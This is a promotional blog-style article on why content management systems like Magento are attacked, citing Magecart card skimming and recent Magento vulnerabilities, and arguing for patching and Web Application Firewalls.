To the uninitiated, a Content Management System (CMS) might not sound quite as important as it actually is. A CMS is a software application that’s responsible for the creation and modification of digital content. That could be anything from WordPress, the popular website and blog building platform, to an e-commerce platform such as Shopify. It allows individuals and businesses to build and maintain web pages without requiring specialized technical knowledge in order to do so. They are powerful, easily customizable, and incredibly fast to use: allowing a person to build a web presence in just a couple of hours. Due to their ease-of-use, many websites — and the businesses and organizations that they are linked to — rely on CMS on a daily basis.
It’s therefore no surprise to hear that, unfortunately, CMS are often targeted by hackers. This is because of their importance, their widespread usage, and the relatively low barrier to entry for hackers. This low barrier to entry is the result of the vulnerability inherent in CMS, which are built on open source frameworks, meaning that the code necessary to break into or otherwise exploit them is publicly available. Hackers scouring the internet for vulnerabilities to exploit, who discover them in CMS, could seize upon them to quickly gain admin access for a website, and then use this privileged access to deface the site, steal information, or distribute malware. Because many thousands of websites wind up sharing the same codebases, vulnerabilities in CMS can have far-reaching, devastating consequences. These vulnerabilities are inherited by websites built on top of the CMS, exposing them to attack in the process.
Here’s why a tool like a Web Application Firewall (WAF) can help.
Attacks target CMS vulnerabilities
There’s no shortage of examples of how CMS vulnerabilities can impact websites. A recent one, however, affected Magento Commerce and Magento Open Source, an open-source e-commerce platform written in PHP. These vulnerabilities were rated as “important” and “critical” severity. They potentially allowed attackers able to access admin privileges to execute arbitrary code, meaning that a bad actor could run any command on the target system that they chose. This could have been anything from stealing sensitive data to launching a denial of service (DoS) attack designed to overload a system with fraudulent traffic requests. Another related vulnerability discovered made it possible for attackers with admin privilege access to get around signature verification.
Attacks on online shopping cart systems, typically Magento, are called Magecart attacks and are frequently used to try and steal payment card information from customers. If a hacker is able to successfully attack this data stream, they will have a card collection tool that could prove to be incredibly damaging to both customers and vendors. Such attacks have, in the past, targeted both SMBs (small and medium-sized businesses) along with government agencies which process online payments. Multiple hacker groups focus on Magecart attacks, and these have been used to target many thousands of online e-commerce stores. Because of the frequency of these attacks, even the FBI has made public recommendations to vendors to keep their software updates as one means of mitigating against these types of attack.
Security updates are a must
Fortunately, in the case of the recently discovered Magento Commerce and Magento Open Source vulnerabilities, Magento owner Adobe quickly issued crucial software updates to stop the code execution vulnerabilities. Vendors running older versions of the Magento versions with the vulnerabilities were recommended to update to the latest versions as quickly as possible to secure their systems.
But not every vulnerability is guaranteed to be spotted by the good guys before it’s sniffed out by bad actors. Once it is, because of how widespread CMS are, the resulting attacks could get very nasty, very quickly. (Plus, no matter how quickly updates are issued, these still rely on people updating their software to plug the vulnerabilities in question.)
Today, it’s essential that website security is taken deadly seriously. Keeping a CMS, website, web applications, and web APIs patched is a challenge for both the companies who make the software and the customers who use it. Fortunately, there is another solution that can help keep you safe from harm if you rely on a CMS, as more and more people do every day.
WAF can help
This is where the importance of a Web Application Firewall (WAF) comes into play. A WAF can provide virtual patching in order to detect — and, more importantly, stop in their tracks — attempted exploitation of any vulnerabilities that have not been patched.
It does this by automatically analyzing and inspecting any incoming requests to applications to stop some of the web’s most potentially damaging security risks, such as SQL injections, remote file inclusion, illegal resource access, cross-site scripting, and more. The goal is to be able to accurately detect attacks before they become attacks, while also minimizing false positives that would hurt legitimate users.
The end result is that you get to continue to reap the rewards and benefits of the world’s most popular Content Management Systems without worry and, in most cases, without even having to think about the potential threats at all. Like any good alarm system, you just get to feel comfort at the fact that you are protected. Because, really, shouldn’t anyone running a business or other organization have other things they’d sooner be focusing their attention on?
Hackers are going to keep going after CMS. Thanks to tools such as WAFs, however, you’re in the perfect position to stop them hitting you where it hurts. It’s a “must have” for anyone who uses a CMS as part of their workflow.
